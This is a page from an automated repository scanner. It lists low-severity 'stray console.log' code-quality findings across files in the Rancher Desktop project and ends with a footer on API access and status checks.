low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/config/settingsImpl.ts:76
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/integrations/windowsIntegrationManager.ts:595
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/layouts/default.vue:159
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/main/commandServer/httpCommandServer.ts:133
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/main/credentialServer/httpCredentialHelperServer.ts:78
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/main/deploymentProfiles.ts:124
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/main/diagnostics/connectedToInternet.ts:40
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/main/extensions/extensions.ts:284
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/main/extensions/manager.ts:284
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/main/imageEvents.ts:101
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/main/networking/index.ts:65
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/main/serverHelper.ts:9
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/main/snapshots/snapshots.ts:118
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/main/tray.ts:216
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/main/update/index.ts:106
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/main/update/LonghornProvider.ts:177
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/pages/FirstRun.vue:203
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/store/diagnostics.ts:98
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/store/extensions.ts:65
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/store/prefs.js:168
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/store/snapshots.ts:25
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/sudo-prompt/test-concurrent.js:25
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/sudo-prompt/test.js:49
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/utils/__tests__/childProcess.spec.ts:43
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/utils/__tests__/dockerDirManager.spec.ts:23
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/utils/__tests__/safeRename.spec.ts:71
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/utils/backgroundProcess.ts:121
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/utils/commandLine.ts:40
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/utils/dockerDirManager.ts:81
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/utils/logging.ts:9
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/utils/object.js:70
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/utils/position.js:92
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/utils/processOutputInterpreters/trivy-image-output.ts:66
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — pkg/rancher-desktop/window/index.ts:96
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/build.ts:18
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/check-api-schema.ts:162
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/dependencies/go-source.ts:75
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/dependencies/moby-openapi.ts:82
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/dependencies/sudo-prompt.ts:16
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/dependencies/tar-archives.ts:26
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/dependencies/tools.ts:99
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/dev.ts:94
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/docker-cli-monitor.ts:57
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/e2e.ts:69
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/generateCliCode.ts:174
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/lib/build-utils.ts:304
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/lib/dependencies.ts:658
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/lib/download.ts:38
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/lib/extension-data.ts:84
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/lib/installer-win32.tsx:75
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/lib/sign-win32.ts:154
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/lint-go.ts:72
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/lint-typescript.ts:23
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/populate-update-server.ts:133
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/rddepman.ts:94
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/release-merge-to-main.ts:78
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — scripts/sign.ts:28
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Fq console leak

Showing first 300 of 309. Refine filters or use the findings page for deep search.

For AI agents: Voting guide (TP/FP) MCP manifest Stdio wrapper SARIF Integrate Findings queue Vote TP/FP on findings to calibrate the engine.
For AI agents + API integrations
Email me when this repo regresses
Free. We re-scan periodically; new criticals → your inbox. No signup required for the scan itself.
API access

This page is publicly accessible at: https://repobility.com/scan/e1e86596-98e4-49d3-9e75-8c9c146b8cc6/

To check status programmatically (no auth required): 

curl -s https://repobility.com/api/v1/public/scan/e1e86596-98e4-49d3-9e75-8c9c146b8cc6/

Important — please don't re-submit the same URL repeatedly. The submission endpoint is idempotent: re-submitting the same git URL returns this same scan_token, not a new one. To re-scan this repo, sign up free and use the dashboard.